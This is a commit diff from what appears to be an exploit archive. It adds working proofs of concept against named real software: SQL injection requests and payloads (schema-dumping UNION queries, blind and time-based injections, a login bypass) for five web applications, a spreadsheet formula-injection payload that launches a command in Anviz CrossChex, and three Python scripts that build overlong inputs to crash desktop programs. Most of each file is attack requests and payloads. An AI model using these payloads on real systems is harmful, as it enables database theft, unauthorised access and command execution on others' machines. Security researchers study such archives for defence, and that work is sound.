DB: 2018-11-03

9 changes to exploits/shellcodes WinMTR 0.91 - Denial of Service (PoC) CdCatalog 2.3.1 - Denial of Service (PoC) Zint Barcode Generator 2.6 - Denial of Service (PoC) Anviz AIM CrossChex Standard 4.3 - CSV Injection Fantastic Blog CMS 1.0 - 'id' SQL Injection Jelastic 5.4 - 'host' SQL Injection Gate Pass Management System 2.1 - 'login' SQL Injection qdPM 9.1 - 'filter_by' SQL Injection Yot CMS 3.3.1 - 'aid' SQL Injection
2018-11-03 05:01:48 +00:00 · 2018-11-03 05:01:48 +00:00 · b786988389
commit b786988389
parent 3cce70ac56
10 changed files with 367 additions and 0 deletions
--- a/exploits/php/webapps/45763.txt
+++ b/exploits/php/webapps/45763.txt
@ -0,0 +1,61 @@
+# Exploit Title: Fantastic Blog CMS 1.0 - 'id' SQL Injection
+# Dork: N/A
+# Date: 2018-11-01
+# Exploit Author: Ihsan Sencan
+# Vendor Homepage: https://www.sourcecodester.com/users/ronald-ronniem/
+# Software Link: https://www.sourcecodester.com/sites/default/files/download/Ronald%20Ronnie/fantasticblog_0.zip
+# Version: 1.0
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: N/A
+
+# POC: 
+# 1)
+# http://localhost/[PATH]/single.php?id=[SQL]
+# 
+#[PATH]/single.php
+#....
+#04 $id=$_REQUEST['id']; $query="SELECT * from blogs where id='".$id."'"...........
+#05 $row = mysqli_fetch_assoc($result);
+#....
+GET /[PATH]/single.php?id=%2d%34%27%20%20%55%4e%49%4f%4e%20%53%45%4c%45%43%54%20%31%2c%32%2c%33%2c%28%53%45%4c%45%43%54%20%47%52%4f%55%50%5f%43%4f%4e%43%41%54%28%74%61%62%6c%65%5f%6e%61%6d%65%20%53%45%50%41%52%41%54%4f%52%20%30%78%33%63%36%32%37%32%33%65%29%20%46%52%4f%4d%20%49%4e%46%4f%52%4d%41%54%49%4f%4e%5f%53%43%48%45%4d%41%2e%54%41%42%4c%45%53%20%57%48%45%52%45%20%54%41%42%4c%45%5f%53%43%48%45%4d%41%3d%44%41%54%41%42%41%53%45%28%29%29%2c%35%2c%36%2c%37%2c%38%2c%39%2d%2d%20%2d HTTP/1.1
+Host: TARGET
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Connection: keep-alive
+HTTP/1.1 200 OK
+Date: Thu, 01 Nov 2018 08:42:57 GMT
+Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
+X-Powered-By: PHP/5.6.30
+Keep-Alive: timeout=5, max=100
+Connection: Keep-Alive
+Transfer-Encoding: chunked
+Content-Type: text/html; charset=UTF-8
+
+# POC: 
+# 2)
+# http://localhost/[PATH]/category.php?id=[SQL]
+# 
+#[PATH]/category.php
+#....
+#04 $id=$_REQUEST['id']; $query="SELECT * from blog_categories where id='".$id."'"...........
+#05 $row = mysqli_fetch_assoc($result);?>
+#....
+GET /[PATH]/category.php?id=%2d%34%27%20%20%55%4e%49%4f%4e%20%53%45%4c%45%43%54%20%31%2c%28%53%45%4c%45%43%54%20%47%52%4f%55%50%5f%43%4f%4e%43%41%54%28%74%61%62%6c%65%5f%6e%61%6d%65%20%53%45%50%41%52%41%54%4f%52%20%30%78%33%63%36%32%37%32%33%65%29%20%46%52%4f%4d%20%49%4e%46%4f%52%4d%41%54%49%4f%4e%5f%53%43%48%45%4d%41%2e%54%41%42%4c%45%53%20%57%48%45%52%45%20%54%41%42%4c%45%5f%53%43%48%45%4d%41%3d%44%41%54%41%42%41%53%45%28%29%29%2d%2d%20%2d HTTP/1.1
+Host: TARGET
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Cookie: __atuvc=1%7C44; __atuvs=5bd96b11114f485b000
+Connection: keep-alive
+HTTP/1.1 200 OK
+Date: Thu, 01 Nov 2018 08:46:57 GMT
+Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
+X-Powered-By: PHP/5.6.30
+Keep-Alive: timeout=5, max=100
+Connection: Keep-Alive
+Transfer-Encoding: chunked
+Content-Type: text/html; charset=UTF-8
--- a/exploits/php/webapps/45764.txt
+++ b/exploits/php/webapps/45764.txt
@ -0,0 +1,34 @@
+# Exploit Title: Jelastic 5.4 - 'host' SQL injection
+# Google Dork: N/A
+# Date: [date]
+# Exploit Author: Procode701
+# Vendor Homepage: https://jelastic.com/
+# Software Link: https://jelastic.com/
+# Version: 5.4
+# Tested on: [Kali Linux]
+# CVE : N/A
+
+# POC: 
+# The application /1.0/users/authentication/rest/signin is vulnerable to SQL injection.
+# Vulnerable application Header field: Host:' AND 8494=8494-- ttWV
+
+# EXPLOIT POC :
+# Parameter: Host #1* ((custom) HEADER)
+#     Type: boolean-based blind
+#     Payload:' AND 8494=8494-- ttWV
+# PAYLOAD: ' AND 8494=8494-- ttWV
+
+POST /1.0/users/authentication/rest/signin HTTP/1.1
+Host: localhost'-8564' OR 8495=8495-- yjRM--delay=0
+User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:62.0) Gecko/20100101 Firefox/62.0
+Accept: */*
+Accept-Language: it-IT,it;q=0.8,en-US;q=0.5,en;q=0.3
+Accept-Encoding: gzip, deflate
+Referer: https://localhost
+Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+Content-Length: 128
+Cookie: GLang=en; GLocale=en-us; jrouter=b916bf4d3b39e6029fd403f21566f3f1
+DNT: 1
+Connection: close
+
+charset=UTF-8&hx_lang=en&session=1&ruk=cccc5e05-c0cb-4419-8a34-tab606191&email=testing%40gg.com&password=testing&appid=dashboard
--- a/exploits/php/webapps/45766.txt
+++ b/exploits/php/webapps/45766.txt
@ -0,0 +1,39 @@
+# Exploit Title: Gate Pass Management System 2.1 - 'login' SQL Injection
+# Dork: N/A
+# Date: 2018-11-01
+# Exploit Author: Ihsan Sencan
+# Vendor Homepage: http://www.livebms.com
+# Software Link: https://netcologne.dl.sourceforge.net/project/gatepass/gpms_Update.zip
+# Version: 2.1
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: N/A
+
+# POC: 
+# 1)
+# http://localhost/[PATH]/login-exec.php
+# 
+POST /[PATH]/login-exec.php HTTP/1.1
+Host: TARGET
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Cookie: PHPSESSID=dfbpcp36b5ura1aurmtm3dqbr0
+Connection: keep-alive
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 119
+login=%27%6f%72%20%31%3d%31%20%6f%72%20%27%27%3d%27&password=%27%6f%72%20%31%3d%31%20%6f%72%20%27%27%3d%27&Submit=Login
+HTTP/1.1 302 Found
+Date: Thu, 01 Nov 2018 12:08:54 GMT
+Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
+X-Powered-By: PHP/5.6.30
+Expires: Thu, 19 Nov 1981 08:52:00 GMT
+Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
+Pragma: no-cache
+Set-Cookie: PHPSESSID=e7ed7dtjg0hq3qsv0vil80o086; path=/
+Location: gpms/index.php
+Content-Length: 281
+Keep-Alive: timeout=5, max=100
+Connection: Keep-Alive
+Content-Type: text/html; charset=UTF-8
--- a/exploits/php/webapps/45767.txt
+++ b/exploits/php/webapps/45767.txt
@ -0,0 +1,55 @@
+# Exploit Title: qdPM 9.1 - 'filter_by' SQL Injection
+# Date: 2018-11-01
+# Exploit Author: Özkan Mustafa Akkuş (AkkuS)
+# Contact: https://pentest.com.tr
+# Vendor Homepage: http://qdpm.net
+# Software Link: http://qdpm.net/download-qdpm-free-project-management
+# Version: v9.1
+# Category: Webapps
+# Tested on: XAMPP for Linux 5.6.38-0
+# Software description:
+# Free project management tool for small team
+# qdPM is a free web-based project management tool suitable for a small team working on multiple projects.
+# It is fully configurable. You can easy manage Projects, Tasks and People. Customers interact
+# using a Ticket System that is integrated into Task management.
+
+# Vulnerabilities:
+# The application accommodates 3 different vulnerabilities.
+# SQL Injection - Cross-Site Scripting and Denial of Service.
+
+# POC 1 : SQL Inection :
+# An attacker can gain access to all the database information using filter_by[CommentCreatedFrom]
+# and filter_by[5BCommentCreatedTo] parameters.
+
+# Parameter: filter_by[CommentCreatedFrom] and filter_by[5BCommentCreatedTo](POST)
+# Request URL: /index.php/timeReport
+
+#    Type: boolean-based blind
+#    Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
+#    Payload: 
+
+filter_by[CommentCreatedFrom]=2018-10-30") RLIKE (SELECT (CASE WHEN (7166=7166) THEN #0x323031382d31302d3330 ELSE 0x28 END)) AND ("votm"="votm&filter_by[CommentCreatedTo]=2018-10-17
+
+#    Type: error-based
+#    Title: MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)
+#    Payload: 
+
+filter_by[CommentCreatedFrom]=2018-10-30") AND EXTRACTVALUE(2944,CONCAT(0x5c,0x716a766b71,(SELECT #(ELT(2944=2944,1))),0x7178717871)) AND ("ilfY"="ilfY&filter_by[CommentCreatedTo]=2018-10-17
+
+#    Type: stacked queries
+#    Title: MySQL > 5.0.11 stacked queries (comment)
+#    Payload: 
+
+filter_by[CommentCreatedFrom]=2018-10-30");SELECT SLEEP(5)#&filter_by[CommentCreatedTo]=2018-10-17
+
+#    Type: AND/OR time-based blind
+#    Title: MySQL <= 5.0.11 AND time-based blind (heavy query)
+#    Payload:
+
+filter_by[CommentCreatedFrom]=2018-10-30") AND 2173=BENCHMARK(5000000,MD5(0x7652785a)) AND #("PRig"="PRig&filter_by[CommentCreatedTo]=2018-10-17
+
+#    Type: UNION query
+#    Title: Generic UNION query (NULL) - 40 columns
+#    Payload:
+
+filter_by[CommentCreatedFrom]=2018-10-30") UNION ALL SELECT #33,33,33,33,33,33,33,33,33,33,CONCAT(0x716a766b71,0x474b474f65666b437365466773655373776743495a75536670676f41445249514775775a6f4d6a63,0x7178717871),#33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33-- #pqmn&filter_by[CommentCreatedTo]=2018-10-17
--- a/exploits/php/webapps/45768.txt
+++ b/exploits/php/webapps/45768.txt
@ -0,0 +1,58 @@
+# Exploit Title: Yot CMS 3.3.1 - 'aid' SQL Injection
+# Dork: N/A
+# Date: 2018-11-01
+# Exploit Author: Ihsan Sencan
+# Vendor Homepage: https://yot.sourceforge.io/
+# Software Link: https://ayera.dl.sourceforge.net/project/yot/Yot%203.3.1.zip
+# Version: 3.3.1
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: N/A
+
+# POC: 
+# 1)
+# http://localhost/[PATH]/index.php?page=articles&op=art&aid=[SQL]
+# 
+GET /[PATH]/index.php?page=articles&op=art&aid=1++uniON+SElEcT++++0x496873616e%2c0x496873616e%2c0x496873616e%2c0x496873616e%2c0x496873616e%2c0x496873616e%2c0x496873616e%2c0x496873616e%2c0x496873616e%2c0x496873616e%2c0x496873616e%2c0x496873616e%2c(select(@x)from(select(@x:=0x00),(@running_number:=0),(@tbl:=0x00),(selEct(0)frOm(information_schema.COlumns)where(table_schema=database())and(0x00)in(@x:=Concat(@x,0x3c62723e,if((@tbl!=table_name),Concat(0x3c2f6469763e,LPAD(@running_number:=@running_number%2b1,2,0x30),0x3a292020,0x3c666f6e7420636f6c6f723d7265643e,@tbl:=table_name,0x3c2f666f6e743e,0x3c62723e,(@z:=0x00),0x3c646976207374796c653d226d617267696e2d6c6566743a333070783b223e),%200x00),lpad(@z:=@z%2b1,2,0x30),0x3a292020,0x3c666f6e7420636f6c6f723d626c75653e,column_name,0x3c2f666f6e743e))))x)--+- HTTP/1.1
+Host: TARGET
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Connection: keep-alive
+HTTP/1.1 200 OK
+Date: Thu, 01 Nov 2018 23:21:17 GMT
+Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
+X-Powered-By: PHP/5.6.30
+Set-Cookie: PHPSESSID=eatkahgi05mbjht042ipvtifp5; path=/
+Expires: Thu, 19 Nov 1981 08:52:00 GMT
+Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
+Pragma: no-cache
+Keep-Alive: timeout=5, max=100
+Connection: Keep-Alive
+Transfer-Encoding: chunked
+Content-Type: text/html; charset=UTF-8
+
+# POC: 
+# 2)
+# http://localhost/[PATH]/index.php?page=articles&op=cat&cid=[SQL]
+# 
+GET /[PATH]/index.php?page=articles&op=cat&cid=1++uniON+SElEcT++++0x496873616e%2c(select(@x)from(select(@x:=0x00),(@running_number:=0),(@tbl:=0x00),(selEct(0)frOm(information_schema.COlumns)where(table_schema=database())and(0x00)in(@x:=Concat(@x,0x3c62723e,if((@tbl!=table_name),Concat(0x3c2f6469763e,LPAD(@running_number:=@running_number%2b1,2,0x30),0x3a292020,0x3c666f6e7420636f6c6f723d7265643e,@tbl:=table_name,0x3c2f666f6e743e,0x3c62723e,(@z:=0x00),0x3c646976207374796c653d226d617267696e2d6c6566743a333070783b223e),%200x00),lpad(@z:=@z%2b1,2,0x30),0x3a292020,0x3c666f6e7420636f6c6f723d626c75653e,column_name,0x3c2f666f6e743e))))x)--+- HTTP/1.1
+Host: TARGET
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Cookie: PHPSESSID=eatkahgi05mbjht042ipvtifp5
+Connection: keep-alive
+HTTP/1.1 200 OK
+Date: Thu, 01 Nov 2018 23:32:28 GMT
+Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
+X-Powered-By: PHP/5.6.30
+Expires: Thu, 19 Nov 1981 08:52:00 GMT
+Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
+Pragma: no-cache
+Keep-Alive: timeout=5, max=100
+Connection: Keep-Alive
+Transfer-Encoding: chunked
+Content-Type: text/html; charset=UTF-8
--- a/exploits/windows/local/45765.txt
+++ b/exploits/windows/local/45765.txt
@ -0,0 +1,27 @@
+# Exploit Title: Anviz AIM CrossChex Standard 4.3 - CSV Injection
+# Author: Gjoko 'LiquidWorm' Krstic @zeroscience
+# Date: 2018-11-01
+# Vendor: Anviz Biometric Technology Co., Ltd.
+# Product web page: https://www.anviz.com
+# Affected version: 4.3.6.0
+# Tested on: Microsoft Windows 7 Professional SP1 (EN)
+# CVE: N/A
+# References
+# Advisory ID: ZSL-2018-5498
+# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2018-5498.php
+
+# Desc: CSV (XLS) Injection (Excel Macro Injection or Formula
+# Injection) exists in the AIM CrossChex 4.3 when importing
+# or exporting users using xls Excel file. This can be exploited
+# to execute arbitrary commands on the affected system via
+# SE attacks when an attacker inserts formula payload in the
+# 'Name' field when adding a user or using the custom fields
+# 'Gender', 'Position', 'Phone', 'Birthday', 'Employ Date'
+# and 'Address'. Upon importing, the application will launch
+# Excel program and execute the malicious macro formula.
+
+# PoC
+# From the menu:
+
+User -> Add -> use payload: =cmd|' /C mspaint'!L337
+User -> Import / Export: use payload: =cmd|' /C mspaint'!L337
--- a/exploits/windows_x86-64/dos/45769.py
+++ b/exploits/windows_x86-64/dos/45769.py
@ -0,0 +1,28 @@
+# Exploit Title: WinMTR 0.91 - Denial of Service (PoC)
+# Dork: N/A
+# Date: 2018-11-01
+# Exploit Author: Ihsan Sencan
+# Vendor Homepage: http://winmtr.net
+# Software Link: http://winmtr.net/winmtr_download/
+# Version: 0.91
+# Category: Dos
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: N/A
+
+# POC: 
+# 1)
+# Host: Payload
+
+#!/usr/bin/python
+    
+buffer = "A" * 238
+ 
+payload = buffer
+try:
+    f=open("exp.txt","w")
+    print "[+] Creating %s bytes evil payload." %len(payload)
+    f.write(payload)
+    f.close()
+    print "[+] File created!"
+except:
+    print "File cannot be created."
--- a/exploits/windows_x86-64/dos/45770.py
+++ b/exploits/windows_x86-64/dos/45770.py
@ -0,0 +1,28 @@
+# Exploit Title: CdCatalog 2.3.1 - Denial of Service (PoC)
+# Dork: N/A
+# Date: 2018-11-01
+# Exploit Author: Ihsan Sencan
+# Vendor Homepage: http://cdcat.sourceforge.net
+# Software Link: https://netcologne.dl.sourceforge.net/project/cdcat/cdcat/cdcat-2.3.1/cdcat-2.3.1.tar.bz2
+# Version: 2.3.1
+# Category: Dos
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: N/A
+
+# POC: 
+# 1)
+# CTRL+O & File/Open/exp.hcf
+
+#!/usr/bin/python
+    
+buffer = "A" * 21
+ 
+payload = buffer
+try:
+    f=open("exp.hcf","w")
+    print "[+] Creating %s bytes evil payload." %len(payload)
+    f.write(payload)
+    f.close()
+    print "[+] File created!"
+except:
+    print "File cannot be created."
--- a/exploits/windows_x86-64/dos/45772.py
+++ b/exploits/windows_x86-64/dos/45772.py
@ -0,0 +1,28 @@
+# Exploit Title: Zint Barcode Generator 2.6 - Denial of Service (PoC)
+# Dork: N/A
+# Date: 2018-11-01
+# Exploit Author: Ihsan Sencan
+# Vendor Homepage: http://www.zint.org.uk
+# Software Link: https://sourceforge.net/projects/zint/files/latest/download
+# Version: 2.6
+# Category: Dos
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: N/A
+
+# POC: 
+# 1)
+# Add 2D Component / 2D Component Data
+
+#!/usr/bin/python
+    
+buffer = "A" * 44450
+ 
+payload = buffer
+try:
+    f=open("exp.txt","w")
+    print "[+] Creating %s bytes evil payload." %len(payload)
+    f.write(payload)
+    f.close()
+    print "[+] File created!"
+except:
+    print "File cannot be created."
--- a/files_exploits.csv
+++ b/files_exploits.csv
@ -6172,6 +6172,9 @@ id,file,description,date,author,type,platform,port
 45760,exploits/windows_x86-64/dos/45760.py,"Artha The Open Thesaurus 1.0.3.0 - Denial of Service (PoC)",2018-11-01,"Ihsan Sencan",dos,windows_x86-64,
 45761,exploits/windows_x86-64/dos/45761.py,"WebDrive 18.00.5057 - Denial of Service (PoC)",2018-11-01,"Victor Mondragón",dos,windows_x86-64,
 45762,exploits/windows_x86/dos/45762.py,"Arm Whois 3.11 - Denial of Service (PoC)",2018-11-01,"Yair Rodríguez Aparicio",dos,windows_x86,
+45769,exploits/windows_x86-64/dos/45769.py,"WinMTR 0.91 - Denial of Service (PoC)",2018-11-02,"Ihsan Sencan",dos,windows_x86-64,
+45770,exploits/windows_x86-64/dos/45770.py,"CdCatalog 2.3.1 - Denial of Service (PoC)",2018-11-02,"Ihsan Sencan",dos,windows_x86-64,
+45772,exploits/windows_x86-64/dos/45772.py,"Zint Barcode Generator 2.6 - Denial of Service (PoC)",2018-11-02,"Ihsan Sencan",dos,windows_x86-64,
 3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
 4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
 12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
@ -10073,6 +10076,7 @@ id,file,description,date,author,type,platform,port
 45738,exploits/windows/local/45738.py,"R 3.4.4 (Windows 10 x64) - Buffer Overflow (DEP/ASLR Bypass)",2018-10-30,"Charles Truscott",local,windows,
 45742,exploits/openbsd/local/45742.sh,"xorg-x11-server 1.20.3 - Privilege Escalation",2018-10-30,"Marco Ivaldi",local,openbsd,
 45744,exploits/windows/local/45744.rb,"Any Sound Recorder 2.93 - Buffer Overflow Local (SEH) (Metasploit)",2018-10-30,d3ckx1,local,windows,
+45765,exploits/windows/local/45765.txt,"Anviz AIM CrossChex Standard 4.3 - CSV Injection",2018-11-02,LiquidWorm,local,windows,
 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@ -40272,3 +40276,8 @@ id,file,description,date,author,type,platform,port
 45756,exploits/php/webapps/45756.txt,"Asaancart Simple PHP Shopping Cart 0.9 - Arbitrary File Upload / SQL Injection",2018-10-30,"Ihsan Sencan",webapps,php,80
 45757,exploits/php/webapps/45757.txt,"CI User Login and Management 1.0 - Arbitrary File Upload",2018-10-30,"Ihsan Sencan",webapps,php,80
 45758,exploits/php/webapps/45758.py,"Loadbalancer.org Enterprise VA MAX 8.3.2 - Remote Code Execution",2018-10-31,"Jakub Palaczynski",webapps,php,
+45763,exploits/php/webapps/45763.txt,"Fantastic Blog CMS 1.0 - 'id' SQL Injection",2018-11-02,"Ihsan Sencan",webapps,php,80
+45764,exploits/php/webapps/45764.txt,"Jelastic 5.4 - 'host' SQL Injection",2018-11-02,Procode701,webapps,php,80
+45766,exploits/php/webapps/45766.txt,"Gate Pass Management System 2.1 - 'login' SQL Injection",2018-11-02,"Ihsan Sencan",webapps,php,80
+45767,exploits/php/webapps/45767.txt,"qdPM 9.1 - 'filter_by' SQL Injection",2018-11-02,AkkuS,webapps,php,80
+45768,exploits/php/webapps/45768.txt,"Yot CMS 3.3.1 - 'aid' SQL Injection",2018-11-02,"Ihsan Sencan",webapps,php,80